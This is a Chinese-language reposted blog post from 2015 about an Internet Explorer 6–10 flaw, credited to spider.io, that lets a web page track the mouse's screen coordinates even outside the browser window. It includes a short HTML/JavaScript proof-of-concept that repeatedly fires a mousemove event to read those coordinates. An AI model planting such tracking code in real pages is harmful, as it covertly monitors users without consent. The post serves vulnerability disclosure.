IE浏览器鼠标坐标跟踪安全风险,通杀全版本

最近在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。 影响版本:IE6-10

IE浏览器鼠标坐标跟踪安全风险,通杀全版本

Code:

<!DOCTYPE html>

<html>

<head>

<meta charset="utf-8" />

<title>Exploit Demo</title>

<script type="text/javascript">

window.attachEvent("onload", function() {

var detector = document.getElementById("detector");

detector.attachEvent("onmousemove", function (e) {

detector.innerHTML = e.screenX + ", " + e.screenY;

});

setInterval(function () {

detector.fireEvent("onmousemove");

}, 100);

}); www.2cto.com

</script>

</head>

<body>

<div id="detector"></div>

</body>

</html>

分类:默认分类 时间:2015-02-27 人气:1
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.067 (s). 9 q(s)